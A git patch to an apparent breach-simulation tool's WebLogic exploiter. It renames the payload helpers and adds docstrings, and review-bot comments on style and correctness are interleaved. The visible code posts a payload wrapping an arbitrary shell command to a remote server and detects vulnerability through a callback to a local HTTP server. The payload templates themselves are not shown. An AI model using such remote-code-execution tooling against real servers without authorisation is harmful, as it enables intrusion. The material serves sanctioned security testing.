From 57e795573e1e5bbdd4524b02f705931d29d86296 Mon Sep 17 00:00:00 2001
From: Vakaris
Date: Tue, 28 Aug 2018 22:37:07 +0300
Subject: [PATCH] Documented what's required and other minor changes

---
 infection_monkey/exploit/weblogic.py | 30 ++++++++++++++++++++--------
 1 file changed, 22 insertions(+), 8 deletions(-)

diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index 4169bb537..68ea9f5f2 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -56,9 +56,9 @@ class WebLogicExploiter(WebRCE):
     def exploit(self, url, command):
         if 'linux' in self.host.os['type']:
-            payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
+            payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
         else:
-            payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
+            payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
         try:
             post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
         except Exception as e:
@@ -99,12 +99,11 @@ class WebLogicExploiter(WebRCE):
     def stop(self):
         self._stopped = True
-        return
     def check_if_exploitable(self, url):
         # Server might get response faster than it starts listening to it, we need a lock
         httpd, lock = self._start_http_server()
-        payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
+        payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
         try:
             post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
         except exceptions.ReadTimeout:
@@ -116,6 +115,10 @@ class WebLogicExploiter(WebRCE):
         return httpd.get_requests > 0
     def _start_http_server(self):
+        """
+        Starts custom http server that waits for GET requests
+        :return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock)
+        """
         lock = threading.Lock()
         local_port = get_free_tcp_port()
         local_ip = get_interface_to_target(self.host.ip_addr)
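Review bot: `exploit` is still undocumented even though this commit adds docstrings to the two payload helpers it now calls; a docstring such as `"""Run command on the target through the WebLogic payload; stdout and stderr are redirected to /dev/null or NUL, so the command's output is never returned to the caller."""` would record what the appended redirections mean. The branch on `self.host.os['type']` also raises KeyError if the OS dict was never populated with a `type` key; if that can happen in this code base, `if 'linux' in self.host.os.get('type', ''):` keeps the Windows branch as the fallback instead of crashing. The `except Exception as e:` body and the rest of exploit lie outside this hunk.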
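Review bot: `check_if_exploitable` reaches into the server object's private attributes, `httpd._local_ip` and `httpd._local_port`, to build the test payload; having `_start_http_server` return the ip and port alongside `httpd, lock` (or exposing them as public attributes) would make that coupling explicit. The method also gets no docstring although the commit documents its neighbours; `"""Post the test payload pointing at the local HTTP server and report whether the target requested it (httpd.get_requests > 0)."""` matches the visible code. The end of check_if_exploitable is outside this hunk.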
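Review bot: The new docstring on `_start_http_server` says the returned lock is acquired but not what the caller must do with it, while the hunk at -129 shows the lock being released and the server joined and stopped elsewhere; adding `The caller must release the lock and stop the server once the probe is finished.` states that contract. The summary line would also read better in the imperative form the other docstrings could share: `Start a custom HTTP server that waits for GET requests`. The body of _start_http_server continues past this hunk.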
@@ -129,11 +132,16 @@ class WebLogicExploiter(WebRCE):
         lock.release()
         httpd.join(SERVER_TIMEOUT)
         httpd.stop()
-        return True
-
     @staticmethod
-    def exploit_payload(cmd_base, cmd_opt, command):
+    def get_exploit_payload(cmd_base, cmd_opt, command):
+        """
+        Formats the payload used in exploiting weblogic servers
+        :param cmd_base: What command prompt to use eg. cmd
+        :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
+        :param command: command itself
+        :return: Formatted payload
+        """
         empty_payload = '''
@@ -162,7 +170,13 @@ class WebLogicExploiter(WebRCE):
         return payload
     @staticmethod
-    def test_payload(ip, port):
+    def get_test_payload(ip, port):
+        """
+        Gets payload used for testing whether weblogic server is vulnerable
+        :param ip: Server's IP
+        :param port: Server's port
+        :return: Formatted payload
+        """
         generic_check_payload = '''
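Review bot: The docstring on `get_exploit_payload` has wording defects — `eg.` should be `e.g.`, and `:param cmd_opt: cmd_base commands parameters. eg. /c (to run command)` is clearer as `:param cmd_opt: option that makes cmd_base execute the following string, e.g. /c for cmd or -c for /bin/sh`, which are exactly the two pairs exploit() passes in the hunk at -56. It should also say whether `command` is inserted into `empty_payload` verbatim or escaped, because the formatting happens in the body outside this hunk and, if the payload is markup, a command containing characters special to it would silently yield a malformed request. The three lines before `@staticmethod` belong to a method whose definition starts outside the hunk.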
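Review bot: The new docstring on `get_test_payload` describes its arguments as `Server's IP` and `Server's port`, but the only caller visible, check_if_exploitable in the hunk at -99, passes `httpd._local_ip` and `httpd._local_port` of the HTTP server the exploiter starts locally, not the address of the WebLogic target. Rewording to `:param ip: IP of the local HTTP server the target should request back to` and `:param port: port of that local server` makes the docstring agree with the call site. The body of get_test_payload continues past this hunk.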